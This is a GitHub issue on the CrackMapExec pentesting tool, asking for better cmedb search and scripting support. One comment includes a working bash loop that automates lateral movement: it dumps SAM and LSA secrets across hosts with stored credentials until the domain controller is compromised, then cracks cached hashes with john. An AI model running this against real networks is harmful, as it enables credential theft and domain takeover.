byt3bl33d3r / CrackMapExec

A swiss army knife for pentesting networks
BSD 2-Clause "Simplified" License
8.45k stars 1.64k forks source link

cmedb improvement #451

Closed s0i37 closed 3 years ago

s0i37 commented 3 years ago

Hello. I want to suggest you a bit improve current cmedb opportunities. Currently hosts can search only for IP and Hostname. May be it need to search also for other available columns?

cmedb> hosts some_domain
cmedb> hosts Windows 6.1

And the same for creds:

cmedb> creds some_domain
cmedb> creds aad3b435b51404eeaad3b435b51404ee

Also it would be very nice if we can use cmedb and cme together for automatic covering all credentials for all available hosts. I expected something like this:

for cred in $(cmedb "creds" --output=CredID)
do
 cme smb -id $cred --sam <(comm -23 targets.txt <(cmedb "hosts" --output=IP))
done

Hence cmedb should also read commands via arguments like a cmedb "workspace company_x;hosts 10.0.0; hosts 11.0.0". I suppose all of these things could be implement very easy)

s0i37 commented 3 years ago

Ok. Currently I can implement lateral movement automation like this:

sort targets.txt
cme smb -d . -u admin -p password --shares 10.0.0.10  #initial creds
id=1
while :
do
  cme smb -id $id --sam <(comm -23 targets.txt <(sqlite3 ~/.cme/workspaces/default/smb.db "select c.ip from computers as c, users as u, admin_relations as r where r.userid=u.id and r.computerid=c.id"|sort))
  cme smb -id $id --lsa <(comm -23 targets.txt <(sqlite3 ~/.cme/workspaces/default/smb.db "select c.ip from computers as c, users as u, admin_relations as r where r.userid=u.id and r.computerid=c.id"|sort))
  sqlite3 ~/.cme/workspaces/default/smb.db "delete from users where username='Guest'"
  sqlite3 ~/.cme/workspaces/default/smb.db "delete from users where username='DefaultAccount'" 
  cme smb -id $id --shares dc.txt 2>&1 | grep Pwn3d && break
  ((id++))
done
grep -r @ ~/.cme/logs; fgrep -ar '\' ~/.cme/logs | fgrep -v '$:'
john --format=mscash2 <(sort -u ~/.cme/logs/*.cached)
john --format=mscash2 <(sort -u ~/.cme/logs/*.cached) --show
s0i37 commented 3 years ago

It seems that cme doesn't appropriate handle pipe input.

Fix crackmapexec.py:

target_file_type = '' #identify_target_file(target)